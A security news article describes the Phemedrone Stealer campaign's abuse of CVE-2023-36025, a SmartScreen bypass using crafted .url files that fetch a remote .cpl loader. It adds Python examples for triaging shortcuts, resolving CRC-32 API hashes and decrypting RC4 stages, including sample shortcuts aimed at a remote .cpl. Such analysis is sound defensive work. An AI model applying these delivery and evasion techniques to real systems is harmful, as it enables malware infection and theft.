Attackers actively work around Windows Defender SmartScreen by pairing convincing, misleading websites or files with techniques that suppress its warnings.
By evading SmartScreen, threat actors raise the odds that their payload is executed on a victim's system.
These campaigns typically combine social engineering, to get the user to open the file in the first place, with a technical bypass of SmartScreen's protective checks.
CVE-2023-36025 is a security feature bypass in Microsoft Windows Defender SmartScreen that lets a crafted Internet Shortcut (.url) file open without the SmartScreen warning a user would normally see; Microsoft patched it in November 2023.
Proof-of-concept code shared on social media was quickly adopted in malware campaigns, including one delivering the Phemedrone Stealer payload.
To deliver Phemedrone Stealer, the threat actors host malicious Internet Shortcut (.url) files on Discord or cloud services, often hiding the links behind URL shorteners.
Because of CVE-2023-36025, these crafted .url files open without the Windows Defender SmartScreen prompt that would otherwise warn the user.
Opening the file connects to the attacker's server and downloads a Control Panel item (.cpl), which the shortcut then launches without SmartScreen interrupting.
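The delivery step above hinges on a .url file whose target is not a web page but a remote executable type. The following triage script is an added illustration for this article, not code from the campaign or from the researchers who analysed it: it parses the INI-style [InternetShortcut] section, extracts the target, and flags non-web schemes, UNC targets and executable extensions such as .cpl. The heuristics, the host 203.0.113.5 and the file names are assumptions chosen for the example.

```python
"""Triage Internet Shortcut (.url) files for targets that would hand the
user a Control Panel item or other executable instead of a web page.

Constructed example for this article, not code from the campaign or from
the researchers: the heuristics, host 203.0.113.5 and file names are
assumptions chosen to illustrate the .url -> remote .cpl pattern."""
import configparser
from urllib.parse import unquote, urlparse

# File types Windows passes to a loader/interpreter rather than a browser.
EXEC_EXTENSIONS = {".cpl", ".exe", ".dll", ".scr", ".hta", ".js", ".vbs",
                   ".lnk", ".url", ".msi", ".bat", ".cmd", ".ps1"}
# The only schemes a benign bookmark-style .url file normally carries.
WEB_SCHEMES = {"http", "https"}


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] section as a dict, keys case-preserved."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep 'URL', 'IconFile' etc. as written
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])


def target_extension(target: str) -> str:
    """Extension of the final path component, for URLs, UNC and local paths."""
    path = unquote(urlparse(target).path) if "://" in target else target
    name = path.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot > 0 else ""


def assess(text: str) -> dict:
    """Flag a .url file whose target is not a plain web page."""
    fields = parse_url_file(text)
    target = fields.get("URL", "").strip()
    scheme = urlparse(target).scheme.lower() if "://" in target else ""
    ext = target_extension(target)
    reasons = []
    if target.startswith("\\\\"):
        reasons.append("UNC target: opening it fetches from a remote share/WebDAV")
    elif target and scheme not in WEB_SCHEMES:
        reasons.append(f"non-web scheme '{scheme or 'local path'}'")
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"target is an executable type ({ext})")
    return {"target": target, "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples: a benign bookmark, and two shortcuts of the kind the
# article describes, pointing at a remote Control Panel item.
BENIGN_URL = """[InternetShortcut]
URL=https://example.test/docs/index.html
"""

REMOTE_CPL_URL = """[InternetShortcut]
URL=file://203.0.113.5/share/update.cpl
IconIndex=13
IconFile=C:\\Windows\\System32\\SHELL32.dll
"""

UNC_WEBDAV_URL = """[InternetShortcut]
URL=\\\\203.0.113.5@80\\dav\\invoice.cpl
"""

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_URL), ("remote-cpl", REMOTE_CPL_URL),
                        ("unc-webdav", UNC_WEBDAV_URL)):
        r = assess(text)
        print(f"{label:12} suspicious={r['suspicious']} target={r['target']}")
        for why in r["reasons"]:
            print("    -", why)
```

Run it over a directory of extracted .url attachments to get a first-pass list worth a closer look; a hit is a reason to investigate, not proof of exploitation, since legitimate intranet shortcuts to file shares exist.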
The hackers then use the Windows Control Panel process to execute the malicious .cpl, a DLL that acts as a loader.
Researchers found that the PowerShell commands it runs download a ZIP file from GitHub containing three files: a legitimate Windows executable, a malicious DLL, and an encrypted blob carrying a .pdf extension.
The .dll file decrypts the second-stage loader and establishes persistence by creating scheduled tasks.
Techniques such as API hashing, string encryption and VMProtect packing strengthen its evasion.
The loader is brought in by DLL sideloading: the legitimate WerFaultSecure binary loads the spoofed DLL from its own directory in place of the library it expects.
Its imports are hidden and resolved dynamically: instead of storing API names, the loader walks export tables at runtime and matches CRC-32 hashes of the names.
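To make the hashing concrete, here is an added example showing CRC-32 API hashing from both sides: the loader's runtime lookup that compares hashes against export names, and the analyst's precomputed hash-to-name table used to label the hashes found in a sample. This is illustration code, not the loader's own code or the researchers' tooling; the export table is constructed (real kernel32 export names, made-up addresses) and the optional XOR key is an assumed variant of the scheme, not something the article reports.

```python
"""CRC-32 API hashing as used for hidden imports, seen from both sides:
the loader's runtime lookup and the analyst's reverse lookup table.

Added illustration, not code from the loader or from the researchers. The
export table below is constructed: the names are real kernel32 exports,
the addresses are made up, and the optional XOR key is an assumed variant."""
import zlib

# Constructed stand-in for a module's export directory (name -> address).
FAKE_KERNEL32_EXPORTS = {
    "LoadLibraryA": 0x7FFB1C2A0000,
    "GetProcAddress": 0x7FFB1C2A0100,
    "VirtualAlloc": 0x7FFB1C2A0200,
    "VirtualProtect": 0x7FFB1C2A0300,
    "CreateThread": 0x7FFB1C2A0400,
    "WriteProcessMemory": 0x7FFB1C2A0500,
}


def api_hash(name: str, key: int = 0) -> int:
    """Standard CRC-32 (zlib/IEEE) over the ASCII export name, optionally
    XORed with a per-sample key; the key is an assumed variant, not observed."""
    return zlib.crc32(name.encode("ascii")) ^ key


def resolve_by_hash(wanted: int, exports: dict, key: int = 0):
    """Runtime side: walk the export names, hash each, return the match.
    The loader never stores 'VirtualAlloc' as a string, only its hash."""
    for name, addr in exports.items():
        if api_hash(name, key) == wanted:
            return name, addr
    return None


def build_lookup(names, key: int = 0) -> dict:
    """Analyst side: precompute hash -> name for a wordlist of known exports
    so hashes pulled from the sample can be labelled."""
    return {api_hash(n, key): n for n in names}


def label_hashes(hashes, lookup: dict) -> list:
    """Map each embedded hash to an API name, or '<unknown>' if not in the list."""
    return [lookup.get(h, "<unknown>") for h in hashes]


if __name__ == "__main__":
    # What a loader would embed instead of import names (constructed).
    embedded = [api_hash("VirtualAlloc"), api_hash("VirtualProtect"),
                api_hash("CreateThread"), 0xDEADBEEF]
    for h in embedded:
        print(f"{h:08x} -> {resolve_by_hash(h, FAKE_KERNEL32_EXPORTS)}")
    lookup = build_lookup(FAKE_KERNEL32_EXPORTS)
    print(label_hashes(embedded, lookup))
```

In practice the analyst feeds build_lookup the export names of every DLL the sample might touch (kernel32, ntdll, advapi32, wincrypt and so on); if nothing matches, the sample is probably using a different CRC variant, a seed, or a case transform, and api_hash is the one place to adjust.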
The .pdf file is not a document but the encrypted second stage; the loader decrypts it with SystemFunction032, an undocumented Windows API that implements RC4.
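SystemFunction032 is just RC4 behind a Windows export, so a pure-Python implementation of the cipher reproduces exactly what the loader computes and lets an analyst decrypt such a blob offline. The block below is an added example, not the loader's code: on Windows the real function lives in advapi32/cryptsp and takes two USTRING {Length, MaximumLength, Buffer} structures, data first and key second, encrypting the buffer in place. The key, the fake stage bytes and the MZ sanity check are assumptions made for the example.

```python
"""RC4 as SystemFunction032 computes it, with a decrypt-and-check step for
a stage blob carried under a harmless-looking extension.

Added illustration, not the loader's code. SystemFunction032 lives in
advapi32/cryptsp on Windows and takes two USTRING {Length, MaximumLength,
Buffer} arguments, data then key, encrypting the buffer in place; this
pure-Python version reproduces the cipher so it runs anywhere. The key,
the fake stage bytes and the MZ check are assumptions for the example."""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) then keystream XOR (PRGA).
    The same call encrypts and decrypts, exactly as SystemFunction032 does."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):            # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def decrypt_stage(blob: bytes, key: bytes) -> bytes:
    """Decrypt a stage blob and refuse it unless it looks like a PE (MZ header).
    The PE check is an assumed sanity test, not something the article describes."""
    plain = rc4(key, blob)
    if plain[:2] != b"MZ":
        raise ValueError("decrypted data is not a PE image; wrong key?")
    return plain


# Constructed sample: a fake "stage" encrypted with an assumed key, standing
# in for the encrypted payload stored under a .pdf extension.
STAGE_KEY = b"example-key-not-from-campaign"
FAKE_STAGE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 56
ENCRYPTED_STAGE = rc4(STAGE_KEY, FAKE_STAGE)

if __name__ == "__main__":
    print("encrypted head:", ENCRYPTED_STAGE[:4].hex())
    print("decrypted head:", decrypt_stage(ENCRYPTED_STAGE, STAGE_KEY)[:4])
    try:
        decrypt_stage(ENCRYPTED_STAGE, b"wrong-key")
    except ValueError as err:
        print("rejected:", err)
```

When working on a real sample the key is usually recoverable from the loader itself, either as a string constant or as the USTRING buffer passed in the second argument at the SystemFunction032 call site.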
Execution is then redirected to the decrypted second stage through an API callback: the loader calls CryptCATCDFOpen and passes the second stage's entry point as the callback function, so a legitimate Windows API transfers control to the payload rather than the loader calling it directly.
That second stage is Donut, an open-source shellcode generator whose loader can run various file types, such as .NET assemblies and native PE files, entirely in memory.
The case shows how open-source malware components and public exploit code are chained together, and underlines the need for timely patching and robust, layered security controls.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 16 Jan 2024 13:25:04 +0000